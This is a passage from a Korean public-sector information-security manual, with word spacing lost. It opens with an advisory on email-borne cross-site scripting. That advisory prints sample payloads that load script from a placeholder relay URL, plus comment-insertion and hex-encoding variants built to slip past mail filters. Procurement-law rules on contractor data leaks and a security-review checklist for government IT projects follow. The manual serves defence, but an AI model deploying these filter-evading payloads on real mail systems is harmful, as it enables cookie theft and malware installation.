해킹수법설명 o 메일본문에아래와같은유형의명령어 (HTML 태그 ) 를삽입, 메일본문열람과동시에해킹경유지로자동접속 ( 크로스사이트스크립팅공격 ) 시켜악성코드를설치 - expression, IMG, script, STYLE, iframe, INPUT, BGSOUND, DIV, BASE, OBJECT, EMBED, Link 등 실제공격코드예시 <div id=asd title="http:// 해킹경유지 URL"></div> <div style="top:expression(window.rr==2?1:document.scripts[1].src=asd.title;rr=2;)"> </div></tr></td></table> </html> o 그러나대부분의메일서버가이와같은악용가능한 HTML 명령어 ( 태그 ) 가적용된메일수신시차단 ( 필터링 ) 하고있어해커는이를우회하기위해아래와같이다양한수법활용가. 주석문삽입 - expression 등명령어 ( 태그 ) 중간에실행시점에서처리되지않는주석문인 /* 임의문자열 */ 삽입 <div id=asd title="http:// 해킹경유지 URL"></div> <div style="top:exp/*xss*/ression(window.rr==2?1:document.scripts[1]. src=asd.title;rr=2;)"> </div></tr></td></table> </html> 나. Hex 인코딩 - expression(document.write(code.title)) 등명령어 ( 태그 ) 대신이와동일한의미를갖는 hex값 (\65\78\70\72\65\73\73...) 삽입 * \65 : e, \78 : x, \70 : p, \72 : r 등의미 - 140 -
<table style="background: transparent url(http://);top:\65\78\70\72\65\73\73\69\6f\6e\28\64 \6F\63\75\6D\65\6E\74\2E\77\72\69\74\65\28\63\6 F\64\65\2E\74\69\74\6C\65\29\29; repeat scroll 0\ 0\; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;"> \t</table>=0d=0a=0d=0a <div id="code" title="<frameset cols=2,2,*><frame src=http:// 해킹경유지 URL><FRAME><FRAME src=http:// 해킹경유지 URLl></FRAMESET>"> </div> 다. Hex 인코딩 + 주석문삽입 - 위에서설명한 Hex 인코딩 과 주석문삽입 수법을동시에활용 <table STYLE="background: transparent url(http://);top:/*yy*/\65/*yy*/\78/*yy*/\70/*yy*/\72\65/*y y*/\73/*yy*/\73\69/*yy*/\6f\6e/*yy*/\28/*yy*/\65\76\ 61/*yy*/\6c\28\75/*yy*/\6e\65\73/*yy*/\63\61\70/*yy */\65\28\27/*yy*/\25\36\31/*yy*/\25/*yy*/\36/*yy*/\6 3\25/*yy*/\36\35/*yy*/\25\37/*yy*/\32\25/*yy*/\37\3 4/*yy*/\25\32/*yy*/\38\25/*yy*/\32/*yy*/\37\25/*yy*/\ 37\38/*yy*/\25\37/*yy*/\33\25/*yy*/\37\33\25/*yy*/\ 32\30\25/*yy*/\37\34\25/*yy*/\36\35\25/*yy*/\37\33 \25/*yy*/\37\34/*yy*/\25/*yy*/\32/*yy*/\37\25\32/*yy* /\39/*yy*/\27/*yy*/\29/*yy*/\29/*yy*/\29;"> 해킹경유지접속코드 </table> 주석문 (/*yy*/) 을제거하면아래의코드와동일하며 expression 명령어 ( 태그 ) 에 의해 alert(document.cookie) 명령어가실행되어해킹경유지에접속, 악성 코드설치등가능 - 141 -
<table STYLE="background: transparent url(http://);top:expression(eval(unescape('%61%6c%65%72%7 4%28%27%78%73%73%20%74%65%73%74%27%29')));"> 해킹경유지접속코드 </table> /* 설명 */ '61%6c%65%...%29' : alert(document.cookie) 를의미 대응방안 o 메일서버에서 HTML 을이용하여작성된메일을처리하지않도록모든 HTML 태그의실행을차단 o 태그실행이불가피한경우, 본문서에서언급한악용가능한유형의 HTML 태그를실행하지못하도 록각각차단 * 단, 주석문삽입ㆍ Hex 인코딩 등우회공격수법이다양하여 문자열단순비교 만으 로는보안성달성이곤란하므로, 주석문제거, Hex 디코딩 반복적용후 문자열비교 등복합적인점검필요 o 메일서버에악성코드방지기능구현 - 첨부파일등을통해송수신되는악성코드탐지ㆍ차단기능구현 - 로그인시사용자 PC 의악성코드감염여부확인ㆍ차단을위한 PC 방화벽, 악성코드점검및화면 캡쳐방지기능도입권고 o 사용자계정도용방지대책구현 - GPKI 등공인인증서기반사용자로그인기능도입 * 행정기관및그소속기관은의무, 공공기관은권고사항 - 로그인, 사용자정보변경등민감정보입력화면에키로깅방지기능적용 - 개인정보등민감정보소통ㆍ저장시암호화 - 사용자계정 / 비밀번호찾기메뉴제거 * 비밀번호분실시관리자에게유선확인등관리강화 - 2 개 IP 주소에서동시에로그인할수없도록설정 - 142 -
[ 부록 13 ] 국가계약법시행령개정안주요내용및조치사항 - 143 -
1. 개정안주요내용 국가계약법시행령 제76조 1항의단서조항및 18호신설 지방자치단체를당사자로하는계약에관한법률시행령 ( 제92조제1 항19호 ) o 제76 조 ( 부정당업자의입찰참가자격제한 ) 1 각중앙관서의장은계약상대자, 입찰자또는제30 조제2 항에따라지정정보처리장치를이용하여견적서를제출하는자 ( 이하이항에서 계약상대자등 이라한다 ) 또는계약상대자등의대리인ㆍ지배인, 그밖의사용인이다음각호의어느하나에해당하는경우에는법제27 조에따라해당사실이있은후지체없이 1개월이상 2 년이하의범위에서계약상대자등의입찰참가자격을제한하여야한다. 다만, 계약상대자등의사용인의행위로인하여입찰참가자격의제한사유가발생한경우로서계약상대자등이그사용인의행위를방지하기위하여상당한주의와감독을게을리하지아니한경우에는그러하지아니하다. 1 ~ 17 ( 생략 ) 18. 전자정부법제2조 13호에따른정보시스템의구축및유지ㆍ보수계약의이행과정에서알게된정보중각중앙관서의장또는계약담당공무원이누출될경우국가에피해가발생할것으로판단하여사전에누출금지정보로지정하고계약서에명시한정보를무단으로누출한자 국가계약법시행규칙 별표2 20호신설 o ( 별표2) 부정당업자의입찰참가자격제한기준 ( 영제76조제1항관련 ) 1~19 ( 생략 ) 20. 영제76조제1항제18호에해당하는자가. 정보누출횟수가 2회이상인경우 : 3월나. 정보누출횟수가 1회인경우 : 1월가. 부정당업자제재사유추가 ( 제76조 1항 18호 ) o 개정내용 - ( 현행 ) 입찰에참가시키는것이부적당하다고인정되는자에대해서는일정기간동안입찰참가자격을제한 - ( 개정 ) 정보시스템구축등계약이행과정에서자료 ( 사전에유출금지한정보에한정 ) 를유출한자를입찰참가자격제한사유에추가 o 개정이유 - 국가 공공기관의정보화시스템구축및운영과정에서용역업체직원들이취득한자료를 - 144 -
무단으로반출하여보관하다인터넷등을통해유출되는보안사고가빈번히발생하여국가안보까지위협나. 부정당업자제재사유추가 ( 제76조 1항 18호 ) o 개정내용 - ( 현행 ) 계약상대방등의대리인 지배인기타사용인이행한부정당행위에대해서도계약상대자등에대해입찰참가자격을제한 - ( 개정 ) 계약상대방등의대리인 지배인기타사용인의행위로입찰참가자격제한사유가발생한경우 계약상대자등의사용인의행위에대한상당한주의 감독을게을리하지아니한경우에는면책하도록함 o 개정이유 - 사용인의모든행위에대해사업주에게책임을묻는것은책임주의원칙에반할수있다는점을감안 계약상대자등이사용인의부정당행위를방지하기위해상당한주의 감독의무를이행한경우에는면책하도록함다. 정보누출관련부정당업자제재기준신설 ( 규칙별표2 20호 ) o 개정내용 - 정보시스템구축등의계약을이행하는과정에서누출금지정보를무단으로유출한자 정보누출횟수 ( 당해계약에한정 ) 1 회 : 1 개월 정보누출횟수 ( 당해계약에한정 ) 2 회아상 : 3 개월 o 개정이유 - 신규로입찰참가자격제한사유에포함된사유에대하여구체적인제재기준을마련 2. 개정관련조치사항 o 과업지시서ㆍ입찰공고ㆍ계약서에기관이자체작성한 누출금지정보 및 부정당업자제재조치 를정확히명시, 제재근거확보 누출금지정보작성시 < 별첨1>. 누출금지정보의범위가이드참고 o 조달청위임사업의경우조달요청서에 누출금지대상정보 및 부정당업자제재조치 명시, 입찰공고ㆍ계약서에반영토록요구 o 제안서평가시 누출금지정보 관리방안등보안관리계획에대한평가항목및배 - 145 -
점기준마련 o 사업수행용역업체인력이同사항을정확히인지토록보안서약서징구및보안교육실시 o 사업수행중수시로업체인력에대한보안점검을실시, 누출금지정보 외부누출여부확인 o 정보누출적발시국가계약법시행령제76조에의거, 지체없이부정당업자제재조치를실시하고, 관련사항교육과학기술부에통보 타기관의비공개정보보유사실을적발했을경우해당기관및교육과학기술부에관련사실통보 3. 사업추진단계별조치사항 가. 사업준비단계 1 사업계획서작성 ( 내부보고 ) 2 제안요청서 ( 과업지시서 ) 작성 누출금지대상정보및정보누출시부정당업자제재조치 ( 계약법시행령제76 조 ) 명시 3 자체보안대책수립및보안성검토 4 사업계약조달청위임여부판단 ( 조달사업법제5 조의 2, 시행령제9 조의참고 ) 조달청위임사업의경우조달요청서에국가계약법시행령제76조제 1항제 18호에의거한누출금지대상정보를반드시명시, 계약서에반영토록요구나. 입찰공고및계약단계 ( 조달청또는각급기관 ) 1 계약방법선정 ( 협상에의한계약등 ) 및입찰공고 입찰공고시누출금지대상정보및정보누출시부정당업자제재조치명시 2 제안서접수및심사 제안서내사업수행중보안대책적절성여부확인및심사기준에반영 3 업체선정및계약서작성 사업계약서 ( 추가특수조건등활용 ) 내누출금지대상정보및정보누출시부정당업자제재조치명시다. 사업관리단계 1 계약이행지시 감독 2 인원 장비 자료보안관리 3 보안교육및점검수시실시 - 146 -
누출금지대상정보및정보누출시부정당업자제재조치를사전고지하고, 점검등을통한정보누출적발 ( 적발시국정원통보및부정당업자제재조치 ) 라. 사후관리단계 1 검사및검수 2 사업완료에따른용역자료 장비보안조치 3 유지보수사업추진 4 기관자료누출여부상시모니터링 정보누출확인시해당업체부정당업자제재조치 4. 부정당업자등록절차 1 용역사업점검등을통해 누출금지정보 누출적발 2 조달청에 부정당업자제재사유발생 공문통보 3 조달청, 해당업체대상의견수렴 ( 소명기회제공 ) 4 조달청계약심사위원회 ( 위원장 : 조달차장 ) 심사 5 부정당업자제재처분 5. 정보누출적발시유의사항 가. 제재사유해당여부판단발주기관의허락을득하지않은채 누출금지정보 를외부 ( 업무수행외지역 ) 로반출한경우, 제재사유에해당 나. 증빙자료확보 1 정보누출적발시원본은봉인조치, 자료검색은복제본활용 2 중요사항은사진및동영상촬영 3 누출당사자에게자료누출확인서 ( 친필 ) 징구 4 용역업체관리책임자 (PM 등 ) 에게보안관리부실확인서징구 - 147 -
별첨 1. 누출금지정보의범위가이드 1 기관소유전산시스템의내ㆍ외부 IP 주소현황 2 세부전산시스템구성현황및전산망구성도 3 사용자계정및패스워드등시스템접근권한정보 4 전산시스템취약점분석및모의해킹결과물 5 용역사업결과물및프로그램소스코드 ( 해킹ㆍ유출시안보ㆍ국익에피해가우려되는중요용역사 업일경우에해당 ) 용역계약일반조건 ( 회계예규 2200.04-161-8) 제 56 조참고, 해당기관이자체판단 6 국가용보안시스템및정보보호시스템도입현황 7 방화벽ㆍ IPS 등정보보호제품및라우터ㆍ스위치등네트웍장비설정정보 8 공공기관의정보공개에관한법률 제 9 조 1 항에따라비공개대상정보로분류된기관의내부 문서 9 공공기관개인정보보호에관한법률 제 2 조 2 호의개인정보 10 보안업무규정 제 4 조의비밀, 同시행규칙제 7 조 3 항의대외비 11 기타각급기관이공개가불가하다고판단한자료 추가적으로공개불가자료가있을경우최대한구체적으로명시 - 148 -
별첨 2. Q & A - 149 -
- 150 -
별첨 3. 국가계약법주요내용 o 제 2 조 ( 적용범위 ) 국제입찰에의한정부조달계약, 국가가국민을계약상대자로하여체결하는 계약등국가를당사자로하는계약에대하여적용한다. o 제 8 조 ( 입찰공고 ) 각중앙관서의장또는계약담당공무원은경쟁입찰에의하는경우에는입찰에관 한사항을공고또는통지하여야한다. o 제 11 조 ( 계약서의작성및계약의성립 ) 계약을체결하고자할경우에는계약의목적 계약금액 이 행기간 계약보증금 위험부담 지체상금기타필요한사항을명백히기재한계약서를작성하여야 한다. 다만, 대통령령이정하는경우에는이의작성을생략할수있다. o 제13조 ( 감독 ) 1 각중앙관서의장또는계약담당공무원은공사 제조 용역등의계약을체결한경우에는그계약의적정한이행을확보하기위하여필요하다고인정할때에는계약서 설계서기타관계서류에의하여스스로이를감독하거나소속공무원에게그사무를위임하여필요한감독을하게하여야한다. 다만대통령이정하는계약의경우에는전문기관을따로지정하여필요한감독을하게할수있다. o 제14조 ( 검사 ) 1 각중앙관서의장또는계약담당공무원은계약상대자가계약의전부또는일부의이행을완료한때에는이를확인하기위하여계약서 설계서기타관계서류에의하여이를검사하거나소속공무원에게그사무를위임하여필요한검사를하게하여야한다. 다만, 대통령이정하는계약의경우에는전문기관을따로지정하여필요한검사를하게할수있다. o 제27조 ( 부정당업자의입찰참가자격제한 ) 1 각중앙관서의장은경쟁의공정한집행또는계약의적정한이행을해칠염려가있거나기타입찰에참가시키는것이부적합하다고인정되는자에대해서는 2년이내의범위에서대통령이정하는바에따라입찰참가자격을제한하여야하며, 이를즉시다른중앙관서의장에게통보하여야함. 이경우통보를받은다른중안관서의장은대통령이정하는바에의하여해당자의입찰참가자격을제한하여야한다. 3 각중앙관서의장또는계약담당공무원은제1항의규정에따라입찰참가자격을제한받은자와수의계약을체결하야서는아니된다. 다만, 제1항의규정에따라입찰참가자격을제한받은자외에는적합한시공자 제조자가존재하지아니하는등부득이한사유가있는경우에는그러하지아니하다. o 제 76 조 ( 부정당업자의입찰참가자격제한 ) 1 각중앙관서의장은계약상대자, 입찰자또는제 30 조제 2 호에따라지정정보처리장치를이용하여견적서를제출하는자 ( 이하이항에서 계약 - 151 -
상대자등 이라한다 ) 또는계약상대자등의대리인 지배인, 그밖의사용인이다음각호의어느하나에해당하는경우에는법제27조에따라해당사실이있은후지체없이 1개월이상 2년이하의범위에서계약상대자등의입찰참가자격을제한하여야한다. 다만계약상대자등의사용인의행위로인하여입찰참가자격의제한사유가발생한경우로서계약상대자등이그사용인의행위를방지하기위하여상당한주의와감독을게을리하지아니한경우에는그러하지아니한다. 1 ~ 17 생략 18. 전자정부법제2조 13호에따른정보시스템의구축및유지 보수계약의이행과정에서알게된정보중각중앙관서의장또는계약담당공무원이누출될경우국가에피해가발생할것으로판단하여사전에누출금지정보로지정하고계약서에명시한정보를무단으로누출한자 전자정부제2조 ( 정의 ) 13. : 정보시스템 이란정보의수집 가공 저장 검색 송신 수신및그활용과관련되는기기와소프트웨어의조직화된체계를말한다. 2 제 1 항에따른입찰참가자격의제한에관한기간, 동기간의가감그밖에필요한사항은기획재정부 령으로정한다. 3 공동계약의경우에는입찰참가자격의제한사유를야기시킨자에대하여제 1 항의규정을적용한다. 4 제1항내지제3항의규정에의하여입찰참가자격의제한을받은자가법인기타단체인경우에는그대표자에대하여도, 중소기업협동조합인경우에는그원인을직접야기시킨조합원에대하여도제1 항의규정을적용한다, 다만, 대표자가여러명있는경우로당해입찰또는계약에관한업무를관장하지아니한대표자에대하여는그러하지아니하다. 5 각중앙관서의장은제 1 항내지제 4 항의규정에의하여자격이제한된자를대표자로사용하여그 대표자가입찰에관여하는경우에는그사용자에대하여도제 1 항의규정을적용한다. 6 각중앙관서의장은입찰참가자격을제한한때에는다음각호의사항을명백히하여기획재정부령이정하는바에따라지정정보처리장치에게재하여야한다. 1. 업체 ( 상호 ) 명 주소 성명 ( 법인인경우대표자성명, 법인등록번호등 ) 주민등록번호 사업자등록번호 관계법령상면허또는등록번호 2. 입찰참가자격제한기간 3. 입찰참가자경을제한하는구체적인사유 7 각중앙관서의장은제 1 항내지제 5 항의규정에따라입찰참가자격을제한받은자에대하여당해제한 기간내에는그관서에서집행하는모든입찰에참가할수없도록하여야한다. 8 각중앙관서의장은 지방자치단체를당사자로하는계약에관한법률 또는 공공기관의운영에 - 152 -
관한법률 에따른입찰참가자격제한을한사실을통보받거나지정정보처리장치에게재된자에대하여 도입찰에참가할수없도록할수있다. 다만, 제 1 항 1 호내지제 5 호, 제 7 호및제 8 호의사유로입찰참가 자격제한을받은자에대하여는반드시제한하여야한다. 9 각중앙관서의장은제 1 항내지제 4 항의규정에의하여자격이제한된자가상호 대표자변경등의방 법으로제한기간내에이찰에참가하는것을방지하기위하여입찰참가자의주민등록번호, 법인등록 번호, 관계법령상의면허또는등록번호등을확인하여야한다. 10 각중앙관서의장또는계약담당공무원은경쟁입찰에있어낙찰된자가계약체결전에제1항에따라입찰참가자격제한을받은경우에는그낙찰자와계약체결전에제1항에따라입찰참가자격제한을받은경우에는그낙찰자와계약을체결하여서는아니된다. 다만, 장기계속계약을체결한계약상대자가계약이행중입찰참가자격제한을받은경우에, 해당장기계속계약을이행하기위하여연차별계약을체결하는경우에는그러하지아니한다. 11 제 6 항및제 7 항의규정에의한입찰참가자격제한의통보등의절차에관하여필요한사항은기획재정 부령으로정한다. - 153 -
별첨 4. 용어정리 1 계약상대자 : 입찰과정에서계약을낙찰받아국가와계약을체결하는자 2 입찰자 : 국가와계약을체결하기위해서입찰을신청한자 3 견적서를제출하는자 : 입찰을위해지정정보처리장치를통해견적서를제출하는자 4 지정정보처리장치 : 조달청 나라장터 시스템 5 대리인 : 계약상대자를대신하여계약을체결하는자 ( 나라장터시스템에는대리인을사전등록하 게되어있음 ) 6 지배인 : 영업에관한일체의업무를처리하는권한을가진자 ( 통상적으로대리인과동일 ) 7 사용인 : 계약상대자에의해고용된자 ( 직원및하청업체 ) - 154 -
[ 부록 14 ] 정보화사업보안성검토매뉴얼 - 155 -
목차 Ⅰ. 개요 1.1 목적 1.2 방침 1.3 근거 Ⅱ. 보안성검토처리기준 2.1 국정원에요청할정보화사업내역 2.2 광역지자체자체검토정보화사업내역 Ⅲ. 정보화사업세부사례별보안대책 3.1 홈페이지개설등웹시스템구축 3.2 업무시스템 ( 내부직원용 ) 구축 3.3 네트워크ㆍ서버등단순전산장비도입 3.4 외부기관과연동시스템구축 - 156 -
3.5 원격화상회의시스템구축 3.6 CCTV시스템구축 3.7 백업시스템구축 3.8 무선랜운용 3.9 외부인용인터넷검색 PC 설치 3.10 콜센터시스템구축 3.11 인터넷전화 (VoIP) 도입 3.12 정보보호제품도입 3.13 정보화사업용역업체보안관리 ( 공통 ) Ⅳ. 보안 점검표 - 157 -
1. 개요 1.1 목적가. 본매뉴얼은 국가정보보안기본지침 제 26조 ( 보안성검토 ) 에근거하여지자체정보화사업보안성검토업무를수행함에있어일관성ㆍ정확성을유지하기위한상세기준과주요검토내용을언급나. 시 도교육청정보보안담당관이소속ㆍ산하기관및초 중 고등학교정보화사업자체보안심사시확인해야할세부보안대책과네트워크구성방안을제공함으로써업무편의성을지원하고각급기관자체보안관리역량을제고 1.2 방침가. 지자체의효율적인정보화사업추진을위해사업중요도에따라보안성검토처리기준을이원화 o 2.1절의비밀의생산ㆍ등록등을위한정보시스템구축등 11개항목은국가정보원에보안성검토를요청 o 2.2절의홈페이지개설등웹시스템구축, 정보보호제품도입등 13개항목은시 도교육청이동매뉴얼을활용, 사업담당부서 ( 초 중 고포함 ) 의자체보안대책적절성여부확인나. 시 도교육청정보보안담당관은 3절의세부사례별보안대책, 4절의정보화사업보안점검표등을활용, 소속ㆍ산하기관및기초지자체정보화사업추진시보안대책수행여부확인 1.3 근거가. 시 도교육청은본청을포함, 소속ㆍ산하기관및초 중 고정보화사업수행시국가정보원장에게보안성검토를요청나. 단, 정보화시스템단순교체등사인이경미하다고판단하는경우에는보안성검토를생략할수있다. 교육과학기술부정보보안기본지침제22조 2. 보안성검토처리기준 - 158 -
2.1 국정원에요청할정보화사업내역 ❶ 비밀ㆍ국가안보ㆍ정부정책과관련되는사업 o 비밀등국가기밀의유통ㆍ관리와관련된정보시스템구축 o 외교ㆍ국방등국가안보상중요한정보통신망구축 o 재난대비등국가위기관리와관련된정보통신망구축 o 에너지ㆍ교통ㆍ수자원등국가기반시설의전자제어시스템구축 o 외국정부ㆍ기관간정보통신망구축 o 정상회의등국제행사를위한정보통신망구축 o 정부정책을지원하는정보통신망구축 ❷ 대규모예산투입과다량의 DB자료를처리하는사업 o 대규모정보시스템구축 (10억이상 ) 정보화사업 o 다량의개인정보 (100만명이상 ) 를처리하는정보시스템구축 o 지리ㆍ환경정보등국가차원의통합DB 구축 ❸ 외부기관간망연동등보안상취약사업 o 다수기관이공동활용하기위한정보시스템구축및망연동 o 내부전산망또는폐쇄망을인터넷이나타기관의전산망등다른정보통신망과연동하는경우 o 원격근무지원시스템구축 ❹ 보안정책과제및최신 IT기술적용 o 업무망ㆍ인터넷분리정보화사업 o 업무망 인터넷간자료교환시스템구축 o 보안관제센터 ( 보안관제시스템 ) 구축 o 업무망과연결되는무선네트워크시스템구축 o 스마트폰등첨단 IT기술을업무에활용하는시스템구축 ❺ 기타, 국가정보원장및교육과학기술부장관, 시 도교육감이보안성검토가필요하다고판단하는정보화사업 2.2 교육과학기술부및시 도교육청자체검토정보화사업내역 ❶ 기존정형화된정보화사업 - 159 -
o 홈페이지구축ㆍ개선등웹시스템구축 o 민원ㆍ기자실등외부인용무선랜구축및무선랜공유기설치 o 민원ㆍ기자실내외부인용인터넷 PC 및교육장내 PC 설치 o 인사관리ㆍ복지관리시스템구축등인터넷등다른정보통신망과연결되지않은단순내부직원전용정보시스템구축 o 주요기반시설취약점분석ㆍ평가, 정보보안컨설팅등용역사업 ❷ 단일기능의정보시스템구축 o 회의용영상통화시스템등원격화상회의시스템구축 o 주ㆍ정차단속및하천감시용등 CCTV시스템구축 o 백업시스템구축 o 대민콜센터시스템구축 o 인터넷전화시스템구축 ❸ 정보보호제품도입및전산ㆍ통신장비도입ㆍ교체 o 침입차단ㆍ탐지시스템ㆍ가상사설망 (VPN) ㆍUSB관리시스템등정보보호제품도입ㆍ교체 o 스위치ㆍ라우터등네트워크장비및서버등전산장비도입ㆍ교체 o 전화ㆍ무전기및교환기등통신장비도입ㆍ교체 ❹ 기타국가정보원에서기작성ㆍ배포한보안지침으로자체보안대책강구가가능한정보화사업 - 160 -
3. 정보화사업세부사례별보안대책 3.1 홈페이지개설등웹시스템구축 < 사례 > 대표홈페이지구축, 부서별ㆍ소속기관ㆍ산하기관ㆍ각급학교홈페이지구축, 홈페이지리뉴얼등 < 그림 1> 웹서버운용네트워크구성도 보안대책 o 교육과학기술부에서작성 배포 ( 10.5월) 한 웹서버보안취약점대응가이드 를참고하여 12대취약점제거 * 파일업로드, SQL인젝션, 디렉토리리스팅등웹취약점사전제거 o 게시판프로그램등웹응용소프트웨어소스코드의보안취약점사전발굴제거 * 인증우회방지및입력정보적합성검사등 - 161 -
o 웹서버및웹어플리케이션환경설정시불필요한서비스제거및보안설정사전확인 o 관리자기능은내부망의지정된시스템에서만접근할수있도록접근통제 o 사용자개인ㆍ인증정보소통 저장시암호화 o 홈페이지에정보게재시비공개대상정보가게시되지않도록사전보안심사위원회의심의철저이행 o 개인정보및인증정보입력시이용자단말기에키로깅, 화면캡쳐방지대책마련 o 웹로그및이벤트로그 6개월이상저장 o 민원서류발급시스템의경우 인터넷민원시스템보안관리강화통보 ( 09.6) 등참조, 출력문서위ㆍ변조방지등보안대책강구 참고자료 1 웹서버보안취약점대응가이드 ( 10.5월) 2 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제11절웹서버운용 (p63) 3 정보통신망보안관리실무요령 ( 08.8 月 ) 4.3.2 외부네트워크접속보안대책 (p71), 4.5.2 공개서버보안 (p98), 4.5.3 홈페이지보안 (p99) - 162 -
3.2 업무시스템 ( 내부직원용 ) 구축 < 사례 > 인사관리시스템, 복지관리시스템구축등인터넷망과연결되지않은단순 내부직원전용정보시스템 < 그림 2> 업무서버구축네트워크구성도 보안대책 o 사용자계정은해당업무와관련된정보시스템, 응용프로그램및정보에대해서만접근할수있도록직위및임무에따라접근권한제한 o 관리자기능은내부망의지정된 IP에서만접근할수있도록접근통제 o 보안취약점개선을위하여불필요서비스ㆍ계정제거및보안설정을적용하고, 운영체제ㆍ응용프로그램에대한적시보안패치반영 o 내부시스템의설치나장애처리를목적으로외부업체망과원격접속불가 - 163 -
o 도입장비환경설정시보안취약점사전제거 * 불필요한서비스제거및보안관련구성설정확인등 o 장비의물리적보안을위해장비들은물리적접근통제가가능한통제구역 ( 정보통신실 ) 내에보관 o 신규장비도입에따른구장비폐기시저장자료완전삭제조치 참고자료 1 정보통신망보안관리실무요령 ( 08.8 月 ) 3.2 정보시스템환경설정 (p44), 4.3.1 네트워크보안관리 (p66), 4.5 서버보안관리 (p96), 5.2정보시스템저장매체불용처리 (p138) - 164 -
3.4 외부기관과연동시스템구축 < 사례 > 인사관리시스템, 복지관리시스템구축등인터넷망과연결되지않은단순 내부직원전용정보시스템 < 그림 3> 외부기관연동네트워크구성도 보안대책 o 외부기관과연동시에는업무서버영역과직접연결하지말고별도연계서버를활용 o 연계서버와업무서버영역간에는침입차단시스템등보안기능이있는장비를활용, 사전정해진데이터형식만전달토록구성 o 연계서버 유관기관간소통자료보호를위하여 VPN 등활용, 암호화 참고자료 1 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제2절지사및유관기관연동 (p23) 2 정보통신망보안관리실무요령 ( 08.8 月 ) 4.3.2 외부네트워크접속보안대책 (p71) 3.5 원격화상회의시스템구축 < 사례 > - 165 -
회의용영상통화시스템구축등 < 그림 4> 원격화상회의시스템네트워크구성도 보안대책 o 외부와원격영상회의시스템구축시에는 VPN 등활용, 소통자료를암호화하여도청위험방지 전용회선사용이원칙이나비용절감등의사유로인터넷회선을사용시에는반드시암호화소통 o 관련시스템보안취약점개선을위하여불필요서비스ㆍ계정제거및보안관련설정을적용하고, 운영체제ㆍ응용프로그램에대한적시보안패치반영 참고자료 1 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제 3 절원 격화상회의시스템운용 (p28) 3.6 CCTV 시스템구축 < 사례 > 주ㆍ정차단속시스템구축, 하천감시시스템구축등 - 166 -
< 그림 5> CCTV 시스템 ( 단독망 ) 네트워크구성도 < 그림 6> CCTV 시스템 ( 공중망연동 ) 네트워크구성도 보안대책 o 카메라, 비디오서버, 관제서버, 소통망은내부업무망및인터넷과분리, 별도단독망구성을원칙 o 원격지감시등의사유로단독망구축불가시에는전용회선을사용 o 부득이한사유로인터넷을활용할경우중간스니핑을통한영상자료유출을방지하기위 - 167 -
하여원격지카메라 ( 비디오서버 ) 관제서버종단간 VPN 설치등을통한자료암호화소통 관제시스템이운용되는영역으로의접근은별도의침입차단시스템을통해접근차단 o 비인가자의카메라 ( 비디오서버 ) 접근을방지하기위하여 Telnet 등원격접근서비스차단설정, 접근가능 IP제한 ( 관제용서버 IP로한정 ), 디폴트패스워드변경, 카메라IP 외부공개금지등보안조치 o 내부망내시스템과자료교환필요시, CCTV시스템망ㆍ업무망앞의침입차단시스템을각각활용, 특정 IPㆍ포트만접속토록설정 o 외부에 CCTV 설치시카메라, 중계서버는비인가자의임의조작이물리적으로불가능하도록위치하거나시건장치를설치 o 영상기록의임의열람및사적활용방지대책을마련하고, 저장매체는비인가자의접근이불가능하도록시건장치가설치된통제구역에보관 o 자체망구성이불가능할경우외부경비서비스를활용하되중요도가떨어지는소규모시설에한하며장기적으로자체망설치고려 참고자료 1 국가ㆍ공공기관 CCTV시스템보안관리강화통보 ( 09.1월) 2 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제4절 CCTV 무인경비시스템운용 (p33) - 168 -
3.7 백업시스템구축 < 사례 > DR 센터구축, 재난복구시스템구축등 < 그림 7> 원격백업센터네트워크구성도 보안대책 o 백업자료는 VPN 등보안장비를활용암호화전송 o 백업시설은정보통신실과물리적으로일정거리이상위치한장소에설치하며정보통신망과전력공급원분리등정보시스템가용성최대화 o 백업자료가보관된장소는보호구역으로설정ㆍ관리 o 백업된매체는주기적으로복구가가능한지테스트실시 o 백업정보는최소 6개월이상보관 참고자료 1 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제5절원격백업시스템운용 (p37) 2 정보통신망보안관리실무요령 ( 08.8 月 ) 4.10 재난복구대책 (p129) - 169 -
3.8 무선랜운용 < 사례 > 민원실용무선랜시스템구축, 기자실내무선랜공유기설치등 < 그림 8> 민원실用무선랜네트워크구성도 보안대책 o 무선데이타망은업무망과별도분리, 민원인대상인터넷서비스용으로제한 o 무선랜사용자는사전계정신청을받아사용기록등관련접속로그를유지하고암호화는 WPA2 사용 o 업무용노트북 PC 등의 MAC 주소를확인하여무선랜접속을차단하는등직원이민원인을가장한무단접속방지대책강구 o 누구나同무선시스템대상접근이가능하여해킹시도가가능함을고려, AP, 인증서버등무선랜관련시스템보안관리철저시행 단무선랜시스템에서일반인대상해킹발생가능성을고려, 관련법규준수 o 관리자접속은관리용PC로한정하고특정 IP 지정운용 사전승인된랜카드고유번호 (MAC 주소 ) 와 IP에한하여접속가능설정 참고자료 1 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제6절무선랜운용 (p41) - 170 -
2 정보통신망보안관리실무요령 ( 08.8 月 ) 3.4 무선랜보안관리 (p80) 3.9 외부인용인터넷검색 PC 설치 < 사례 > 민원실내 PC 설치, 교육장 ( 외부인사용 ) 내 PC 설치, 기자실 PC 설치등 < 그림 9> 인터넷검색실네트워크구성도 보안대책 o 민원실ㆍ기자실등외부인이인터넷검색이필요할경우기관네트워크와독립적으로기관 ADSL/VDSL 등상용ISP를이용하는것이안전하나불가피한경우침입탐지시스템외부에설치 o PC 내악성코드감염예방을위하여바이러스백신설치및주기적업데이트설정 o 악성코드감염, 민원인사용자료유출등방지를위해하드디스크가초기화될수있는소프트웨어설치권고 참고자료 1 안전한정보통신환경구현을위한네트워크구축가이드라인 ( 09.6 月 ) 제 7 절민원 인을위한인터넷검색실운용 (p45) - 171 -
